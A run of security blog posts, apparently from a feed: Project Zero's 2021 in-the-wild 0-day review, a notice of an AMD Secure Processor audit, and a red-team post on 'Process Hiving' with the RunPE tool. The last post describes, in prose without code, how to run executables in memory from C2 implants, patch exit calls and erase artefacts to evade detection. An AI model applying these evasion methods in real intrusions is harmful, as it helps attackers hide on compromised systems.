With this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn’t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero’s mission is “make 0day hard”. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.

So while we recognize the industry’s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there’s a lot more improving to be done. Having access to more “ground truth” of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.

We had so many more data points in 2021 to learn about attacker behavior than we’ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they’re using or what percentage of 0-days we’re missing in our tracking, so we’ll never know exactly what proportion of 0-days are currently being found and disclosed publicly.

Based on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:

  1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.
  2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.
  3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.

A Record Year for In-the-Wild 0-days

2021 was a record year for in-the-wild 0-days. So what happened?

bar graph showing the number of in-the-wild 0-day detected per year from 2015-2021. The totals are taken from this tracking spreadsheet: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

Is it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.

While we often talk about “0-day exploits used in-the-wild”, what we’re actually tracking are “0-day exploits detected and disclosed as used in-the-wild”. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry.

Overall, we can break down the uptick in the number of in-the-wild 0-days into:

  • More detection of in-the-wild 0-day exploits
  • More public disclosure of in-the-wild 0-day exploitation

More detection

In the 2019 Year in Review, we wrote about the “Detection Deficit”. We stated “As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected.” In the last two years, we believe that there’s been progress on this gap.

Anecdotally, we hear from more people that they’ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we’re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.

A bar graph showing the number of distinct reporters of 0-day in-the-wild vulnerabilities per year for 2019-2021. 2019: 9, 2020: 10, 2021: 20. The data is taken from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

a line graph showing how many in-the-wild 0-days were found by their own vendor per year from 2015 to 2021. 2015: 0, 2016: 0, 2017: 2, 2018: 0, 2019: 4, 2020: 5, 2021: 17. Data comes from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

We’ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it’s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!

More disclosure

The second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate “Google Android” rather than just “Google” because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don’t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by “Anonymous” reporters. If the reporters didn’t want credit for the vulnerability, it’s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn’t have been included in this year’s list if Apple and Google Android had not begun transparently annotating their security advisories.

bar graph that shows the number of Android and Apple (WebKit + iOS + macOS) in-the-wild 0-days per year. The bar graph is split into two color: yellow for Anonymously reported 0-days and green for non-anonymous reported 0-days. 2021 is the only year with any anonymously reported 0-days. 2015: 0, 2016: 3, 2018: 2, 2019: 1, 2020: 3, 2021: Non-Anonymous: 8, Anonymous- 12. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

Kudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for CVE-2021-41773 this past year.

In-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor’s own security advisories.

It's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we’re confident that all vendors are transparently disclosing in-the-wild status, there’s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.

New Year, Old Techniques

We had a record number of “data points” in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit “shapes” previously seen in public research. Once “0-day is hard”, we’d expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty “meh” or standard.

Out of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it’s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:

  • 17 use-after-free
  • 6 out-of-bounds read & write
  • 4 buffer overflow
  • 4 integer overflow

In the next sections we’ll dive into each major platform that we saw in-the-wild 0-days for this year. We’ll share the trends and explain why what we saw was pretty unexceptional.

Chromium (Chrome)

Chromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.

The 14 0-day vulnerabilities were in the following components:

When we look at the components targeted by these bugs, they’re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few less DOM bugs and more targeting these other components of browsers like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.

A couple of the Chromium bugs were even similar to previous in-the-wild 0-days. CVE-2021-21166 is an issue in ScriptProcessorNode::Process() in webaudio where there’s insufficient locks such that buffers are accessible in both the main thread and the audio rendering thread at the same time. CVE-2019-13720 is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.

CVE-2021-30632 is another Chromium in-the-wild 0-day from 2021. It’s a type confusion in the  TurboFan JIT in Chromium’s JavaScript Engine, v8, where Turbofan fails to deoptimize code after a property map is changed. CVE-2021-30632 in particular deals with code that stores global properties. CVE-2020-16009 was also an in-the-wild 0-day that was due to Turbofan failing to deoptimize code after map deprecation.

WebKit (Safari)

Prior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due the sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don’t have historical samples to go off of. Instead, we’ll look at 2021’s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days.

The 7 in-the-wild 0-days targeted the following components:

The one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021.

It would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there’s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, CVE-2021-21166, also existed in WebKit and was fixed as CVE-2021-1844, though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, CVE-2021-30858, was very, very similar to a bug fixed in Chromium in January 2020.

Internet Explorer

Since we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we’ve ever tracked even though Internet Explorer’s market share of web browser users continues to decrease.

Bar graph showing the number of Internet Explorer itw 0-days discovered per year from 2015-2021. 2015: 3, 2016: 4, 2017: 3, 2018: 1, 2019: 3, 2020: 2, 2021: 4. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

So why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn’t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we’ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats.

The four 0-days targeted the following components:

For CVE-2021-26411 targets of the campaign initially received a .mht file, which prompted the user to open in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. CVE-2021-33742 and CVE-2021-40444 were delivered to targets via malicious Office documents.

CVE-2021-26411 and CVE-2021-33742 were two common memory corruption bug patterns: a use-after-free due to a user controlled callback in between two actions using an object and the user frees the object during that callback and a buffer overflow.

There were a few different vulnerabilities used in the exploit chain that used CVE-2021-40444, but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.

Windows

Windows is the platform where we’ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and predicted with the end-of-life of Windows 7 in 2020 and thus why it’s still not especially novel.

In 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:

The number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of those 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10 Microsoft began dedicating more and more resources to locking down the attack surface of Win32k so as those older versions have hit end-of-life, Win32k is a less and less attractive attack surface.

Similar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. CVE-2021-1732 is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn’t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, CVE-2022-21882, is due to CVE-2021-1732 actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. CVE-2021-40449 is a use-after-free in NtGdiResetDC due to the object being freed during the user callback.

iOS/macOS

As discussed in the “More disclosure” section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day (CVE-2021-30869) was also found. In this section we’re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).

Bar graph showing the number of macOS and iOS itw 0-days discovered per year. macOs is 0 for every year except 2021 when 1 was discovered. iOS - 2015: 0, 2016: 2, 2017: 0, 2018: 2, 2019: 0, 2020: 3, 2021: 5. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

For the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:

These 4 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used CVE-2016-4654, a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen’s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP.  It’s a popular attack surface because historically it’s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. CVE-2021-30807 is an out-of-bounds read and CVE-2021-30883 is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 0-day in IOMobileFrameBuffer, CVE-2022-22587.

One iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel and both vulnerabilities were in code related to XNU’s inter-process communication (IPC) functionality. CVE-2021-1782 exploited a vulnerability in mach vouchers while CVE-2021-30869 exploited a vulnerability in mach messages. This is not the first time we’ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. CVE-2019-6625 was exploited as a part of an exploit chain targeting iOS 11.4.1-12.1.2 and was also a vulnerability in mach vouchers.

Mach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: CVE-2020-27932 & CVE-2020-27950. This year’s CVE-2021-30869 is a pretty close variant to 2020’s CVE-2020-27932. Tielei Wang and Xinru Chi actually presented on this vulnerability at zer0con 2021 in April 2021. In their presentation, they explained that they found it while doing variant analysis on CVE-2020-27932. TieLei Wang explained via Twitter that they had found the vulnerability in December 2020 and had noticed it was fixed in beta versions of iOS 14.4 and macOS 11.2 which is why they presented it at Zer0Con. The in-the-wild exploit only targeted macOS 10, but used the same exploitation technique as the one presented.

The two FORCEDENTRY exploits (CVE-2021-30860 and the sandbox escape) were the only times that made us all go “wow!” this year. For CVE-2021-30860, the integer overflow in CoreGraphics, it was because:

  1. For years we’ve all heard about how attackers are using 0-click iMessage bugs and finally we have a public example, and
  2. The exploit was an impressive work of art.

The sandbox escape (CVE requested, not yet assigned) was impressive because it’s one of the few times we’ve seen a sandbox escape in-the-wild that uses only logic bugs, rather than the standard memory corruption bugs.

For CVE-2021-30860, the vulnerability itself wasn’t especially notable: a classic integer overflow within the JBIG2 parser of the CoreGraphics PDF decoder. The exploit, though, was described by Samuel Groß & Ian Beer as “one of the most technically sophisticated exploits [they]’ve ever seen”. Their blogpost shares all the details, but the highlight is that the exploit uses the logical operators available in JBIG2 to build NAND gates which are used to build its own computer architecture. The exploit then writes the rest of its exploit using that new custom architecture. From their blogpost:

        

Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

This is an example of what making 0-day exploitation hard could look like: attackers having to develop a new and novel way to exploit a bug and that method requires lots of expertise and/or time to develop. This year, the two FORCEDENTRY exploits were the only 0-days out of the 58 that really impressed us. Hopefully in the future, the bar has been raised such that this will be required for any successful exploitation.

Android

There were 7 Android in-the-wild 0-days detected and disclosed this year. Prior to 2021 there had only been 1 and it was in 2019: CVE-2019-2215. Like WebKit, this lack of data makes it hard for us to assess trends and changes. Instead, we’ll compare it to public security research.

For the 7 Android 0-days they targeted the following components:

5 of the 7 0-days from 2021 targeted GPU drivers. This is actually not that surprising when we consider the evolution of the Android ecosystem as well as recent public security research into Android. The Android ecosystem is quite fragmented: many different kernel versions, different manufacturer customizations, etc. If an attacker wants a capability against “Android devices”, they generally need to maintain many different exploits to have a decent percentage of the Android ecosystem covered. However, if the attacker chooses to target the GPU kernel driver instead of another component, they will only need to have two exploits since most Android devices use 1 of 2 GPUs: either the Qualcomm Adreno GPU or the ARM Mali GPU.

Public security research mirrored this choice in the last couple of years as well. When developing full exploit chains (for defensive purposes) to target Android devices, Guang Gong, Man Yue Mo, and Ben Hawkes all chose to attack the GPU kernel driver for local privilege escalation. Seeing the in-the-wild 0-days also target the GPU was more of a confirmation rather than a revelation. Of the 5 0-days targeting GPU drivers, 3 were in the Qualcomm Adreno driver and 2 in the ARM Mali driver.

The two non-GPU driver 0-days (CVE-2021-0920 and CVE-2021-1048) targeted the upstream Linux kernel. Unfortunately, these 2 bugs shared a singular characteristic with the Android in-the-wild 0-day seen in 2019: all 3 were previously known upstream before their exploitation in Android. While the sample size is small, it’s still quite striking to see that 100% of the known in-the-wild Android 0-days that target the kernel are bugs that actually were known about before their exploitation.

The vulnerability now referred to as CVE-2021-0920 was actually found in September 2016 and discussed on the Linux kernel mailing lists. A patch was even developed back in 2016, but it didn’t end up being submitted. The bug was finally fixed in the Linux kernel in July 2021 after the detection of the in-the-wild exploit targeting Android. The patch then made it into the Android security bulletin in November 2021.

CVE-2021-1048 remained unpatched in Android for 14 months after it was patched in the Linux kernel. The Linux kernel was actually only vulnerable to the issue for a few weeks, but due to Android patching practices, that few weeks became almost a year for some Android devices. If an Android OEM synced to the upstream kernel, then they likely were patched against the vulnerability at some point. But many devices, such as recent Samsung devices, had not and thus were left vulnerable.

Microsoft Exchange Server

In 2021, there were 5 in-the-wild 0-days targeting Microsoft Exchange Server. This is the first time any Exchange Server in-the-wild 0-days have been detected and disclosed since we began tracking in-the-wild 0-days. The first four (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065)  were all disclosed and patched at the same time and used together in a single operation. The fifth (CVE-2021-42321) was patched on its own in November 2021. CVE-2021-42321 was demonstrated at Tianfu Cup and then discovered in-the-wild by Microsoft. While no other in-the-wild 0-days were disclosed as part of the chain with CVE-2021-42321, the attackers would have required at least another 0-day for successful exploitation since CVE-2021-42321 is a post-authentication bug.

Of the four Exchange in-the-wild 0-days used in the first campaign, CVE-2021-26855, which is also known as “ProxyLogon”, is the only one that’s pre-auth. CVE-2021-26855 is a server side request forgery (SSRF) vulnerability that allows unauthenticated attackers to send arbitrary HTTP requests as the Exchange server. The other three vulnerabilities were post-authentication. For example, CVE-2021-26858 and CVE-2021-27065 allowed attackers to write arbitrary files to the system. CVE-2021-26857 is a remote code execution vulnerability due to a deserialization bug in the Unified Messaging service. This allowed attackers to run code as the privileged SYSTEM user.

For the second campaign, CVE-2021-42321, like CVE-2021-26858, is a post-authentication RCE vulnerability due to insecure deserialization. It seems that while attempting to harden Exchange, Microsoft inadvertently introduced another deserialization vulnerability.

While there were a significant amount of 0-days in Exchange detected and disclosed in 2021, it’s important to remember that they were all used as 0-day in only two different campaigns. This is an example of why we don’t suggest using the number of 0-days in a product as a metric to assess the security of a product. Requiring the use of four 0-days for attackers to have success is preferable to an attacker only needing one 0-day to successfully gain access.

While this is the first time Exchange in-the-wild 0-days have been detected and disclosed since Project Zero began our tracking, this is not unexpected. In 2020 there was n-day exploitation of Exchange Servers. Whether this was the first year that attackers began the 0-day exploitation or if this was the first year that defenders began detecting the 0-day exploitation, this is not an unexpected evolution and we’ll likely see it continue into 2022.

Outstanding Questions

While there has been progress on detection and disclosure, that progress has shown just how much work there still is to do. The more data we gained, the more questions that arose about biases in detection, what we’re missing and why, and the need for more transparency from both vendors and researchers.

Until the day that attackers decide to happily share all their exploits with us, we can’t fully know what percentage of 0-days are publicly known about. However when we pull together our expertise as security researchers and anecdotes from others in the industry, it paints a picture of some of the data we’re very likely missing. From that, these are some of the key questions we’re asking ourselves as we move into 2022:

Where are the [x] 0-days?

Despite the number of 0-days found in 2021, there are key targets missing from the 0-days discovered. For example, we know that messaging applications like WhatsApp, Signal, Telegram, etc. are targets of interest to attackers and yet there’s only 1 messaging app, in this case iMessage, 0-day found this past year. Since we began tracking in mid-2014 the total is two: a WhatsApp 0-day in 2019 and this iMessage 0-day found in 2021.

Along with messaging apps, there are other platforms/targets we’d expect to see 0-days targeting, yet there are no or very few public examples. For example, since mid-2014 there’s only one in-the-wild 0-day each for macOS and Linux. There are no known in-the-wild 0-days targeting cloud, CPU vulnerabilities, or other phone components such as the WiFi chip or the baseband.

This leads to the question of whether these 0-days are absent due to lack of detection, lack of disclosure, or both?

Do some vendors have no known in-the-wild 0-days because they’ve never been found or because they don’t publicly disclose?

Unless a vendor has told us that they will publicly disclose exploitation status for all vulnerabilities in their platforms, we, the public, don’t know if the absence of an annotation means that there is no known exploitation of a vulnerability or if there is, but the vendor is just not sharing that information publicly. Thankfully this question is something that has a pretty clear solution: all device and software vendors agreeing to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited in-the-wild.

Are we seeing the same bug patterns because that’s what we know how to detect?

As we described earlier in this report, all the 0-days we saw in 2021 had similarities to previously seen vulnerabilities. This leads us to wonder whether or not that’s actually representative of what attackers are using. Are attackers actually having success exclusively using vulnerabilities in bug classes and components that are previously public? Or are we detecting all these 0-days with known bug patterns because that’s what we know how to detect? Public security research would suggest that yes, attackers are still able to have success with using vulnerabilities in known components and bug classes the majority of the time. But we’d still expect to see a few novel and unexpected vulnerabilities in the grouping. We posed this question back in the 2019 year-in-review and it still lingers.

Where are the spl0itz?

To successfully exploit a vulnerability there are two key pieces that make up that exploit: the vulnerability being exploited, and the exploitation method (how that vulnerability is turned into something useful).

Unfortunately, this report could only really analyze one of these components: the vulnerability. Out of the 58 0-days, only 5 have an exploit sample publicly available. Discovered in-the-wild 0-days are the failure case for attackers and a key opportunity for defenders to learn what attackers are doing and make it harder, more time-intensive, more costly, to do it again. Yet without the exploit sample or a detailed technical write-up based upon the sample, we can only focus on fixing the vulnerability rather than also mitigating the exploitation method. This means that attackers are able to continue to use their existing exploit methods rather than having to go back to the design and development phase to build a new exploitation method. While acknowledging that sharing exploit samples can be challenging (we have that challenge too!), we hope in 2022 there will be more sharing of exploit samples or detailed technical write-ups so that we can come together to use every possible piece of information to make it harder for the attackers to exploit more users.

As an aside, if you have an exploit sample that you’re willing to share with us, please reach out. Whether it’s sharing with us and having us write a detailed technical description and analysis or having us share it publicly, we’d be happy to work with you.

Conclusion

Looking back on 2021, what comes to mind is “baby steps”. We can see clear industry improvement in the detection and disclosure of 0-day exploits. But the better detection and disclosure has highlighted other opportunities for progress. As an industry we’re not making 0-day hard. Attackers are having success using vulnerabilities similar to what we’ve seen previously and in components that have previously been discussed as attack surfaces.The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method.  And while we made distinct progress in detection and disclosure it has shown us areas where that can continue to improve.

While this all may seem daunting, the promising part is that we’ve done it before: we have made clear progress on previously daunting goals. In 2019, we discussed the large detection deficit for 0-day exploits and 2 years later more than double were detected and disclosed. So while there is still plenty more work to do, it’s a tractable problem. There are concrete steps that the tech and security industries can take to make it even more progress:

  1. Make it an industry standard behavior for all vendors to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited,
  2. Vendors and security researchers sharing exploit samples or detailed descriptions of the exploit techniques.
  3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.

Through 2021 we continually saw the real world impacts of the use of 0-day exploits against users and entities. Amnesty International, the Citizen Lab, and others highlighted over and over how governments were using commercial surveillance products against journalists, human rights defenders, and government officials. We saw many enterprises scrambling to remediate and protect themselves from the Exchange Server 0-days. And we even learned of peer security researchers being targeted by North Korean government hackers. While the majority of people on the planet do not need to worry about their own personal risk of being targeted with 0-days, 0-day exploitation still affects us all. These 0-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful in these attacks.

2021 showed us we’re on the right track and making progress, but there’s plenty more to be done to make 0-day hard.

Release of Technical Report into the AMD Security Processor

By: Anonymous
10 May 2022 at 19:00

Posted by James Forshaw, Google Project Zero

Today, members of Project Zero and the Google Cloud security team are releasing a technical report on a security review of AMD Secure Processor (ASP). The ASP is an isolated ARM processor in AMD EPYC CPUs that adds a root of trust and controls secure system initialization. As it's a generic processor AMD can add additional security features to the firmware, but like with all complex systems it's possible these features might have security issues which could compromise the security of everything under the ASP's management.

The security review undertaken was on the implementation of the ASP on the 3rd Gen AMD EPYC CPUs (codenamed "Milan"). One feature of the ASP of interest to Google is Secure Encrypted Virtualization (SEV). SEV adds encryption to the memory used by virtual machines running on the CPU. This feature is of importance to Confidential Computing as it provides protection of customer cloud data in use, not just at rest or when sending data across a network.

A particular emphasis of the review was on the Secure Nested Paging (SNP) extension to SEV added to "Milan". SNP aims to further improve the security of confidential computing by adding integrity protection and mitigations for numerous side-channel attacks. The review was undertaken with full cooperation with AMD. The team was granted access to source code for the ASP, and production samples to test hardware attacks.

The review discovered 19 issues which have been fixed by AMD in public security bulletins. These issues ranged from incorrect use of cryptography to memory corruption in the context of the ASP firmware. The report describes some of the more interesting issues that were uncovered during the review as well as providing a background on the ASP and the process the team took to find security issues. You can read more about the review on the Google Cloud security blog and the final report.

Introducing Process Hiving & RunPE

By: Rob Bone
2 September 2021 at 09:00
Process Hiving Cover 2

Download our whitepaper and tool

This blog is a condensed version of a whitepaper we’ve released, called “Process Hiving”.  It comes with a new tool too, “RunPE”.  You can download these at the links below.

Whitepaper

Our process hiving whitepaper can be downloaded here.

Tool

RunPE, our accompanying tool, can be downloaded from GitHub.

High quality red team operations are research-led. Being able to simulate current and emerging threats at an accurate level is of paramount importance if the engagement is going to provide value to clients.

One common use case for offensive operations is the requirement to run native executable files or compiled code on the target and in memory. Loading and running these files in memory is not a new technique, but running executables as secondary modules within a Command & Control (C2) framework is rarer, particularly those that support arguments from the host process.

This blog introduces innovative techniques and is a must have tool for the red team arsenal. RunPE is a .NET assembly that uses a technique called Process Hiving to manually load an unmanaged executable into memory along with all its dependencies, run that executable with arguments passed at runtime, including capturing any output, before cleaning up and restoring memory to hide any trace that it was run.

What is it?

The aim of this project is to develop a .NET assembly that provides a mechanism for running arbitrary unmanaged executables in memory. It should allow arguments to be provided, load any libraries that are required by the code, obtain any STDOUT and STDERR from the process execution, and not terminate the host process once the execution of the loaded PE finishes.

This .NET assembly must be able to be run in the normal way in C2 frameworks, such as by execute-assembly in Cobalt Strike or run-exe in PoshC2, in order to extend the functionality of those frameworks.

Finally, as this is to all take place in an implant process, any artefacts in memory should then be cleaned up by zeroing out the memory and removing them or restoring original values in order to better hide the activity.

We’re calling this technique of running multiple PEs from the within the same process ‘Process Hiving’ and the result of this work is the .NET assembly RunPE. In essence this technique:

  • Receives a file path or base64 blob of a PE to run
  • Manually maps that file into memory without using the Windows Loader in the host process
  • Loads any dependencies required by the target PE
  • Patches memory to provide arguments to the target PE when it is run
  • Patches various API calls to allow the target PE to run correctly
  • Replaces the file descriptors in use to capture output
  • Patches various API calls to prevent the host process from exiting when the PE finishes executing
  • Runs the target PE from within the host process, while maintaining host process functionality
  • Restores memory, unloads dependencies, removes patches and cleans up artefacts in memory after executing

Loading the PE

The starting point for the work was @subtee‘s .NET PE Loader utilised in GhostPack’s SafetyKatz. This .NET PE Loader already mapped a PE into memory manually and invoked the entry point, however a few issues remained preventing its use it in an implant process. SafetyKatz uses a ‘slightly modified’ version of Mimikatz as the target PE, critically to not require arguments or exit the process upon completion.

The first step then was to re-use as much of this work as possible and rewrite it to suit our needs – no need to reinvent the wheel when a lot of great work was already done. The modified loader manually maps the target PE into memory, performs any fixups and then loads any dependency DLLs that are not already loaded. The Import Address Table for the PE is patched with the locations of all the libraries once they are loaded, mimicking the real Windows loader.

Patching Arguments

In a Windows process a pointer to the command line arguments is located in the Process Environment Block (PEB) and can be retrieved directly or, more commonly, using the Windows API call GetCommandLine. Similarly, the current image name is also stored in the PEB. With RunPE, the command line and image name are backed-up for when we reset during the clean-up phase and then replaced with the new values for the target PE.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 8.png

Preventing Process Exit

Another issue with running vanilla PEs in this way is that when they finish executing the PE inevitably tries to exit the process, such as by calling TerminateProcess.

Similarly, as the RunPE process is .NET, the CLR also tries to shut down once process termination is initiated, so even if TerminateProcess is prevented CorExitProcess will cause any .NET implant to exit.

To circumvent this a number of these API calls are patched to instead jmp to ExitThread. As the entry point of the target PE is to be run in a new thread this means that once it has finished it will gracefully exit the thread only, leaving the process and CLR instead.

These API calls are patched with bytes that use Return Oriented Programming (ROP) to instead call ExitThread, passing an exit code of 0.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 12.png

An example of this patch if the ExitThread function was located at 0x1337133713371337 is below:

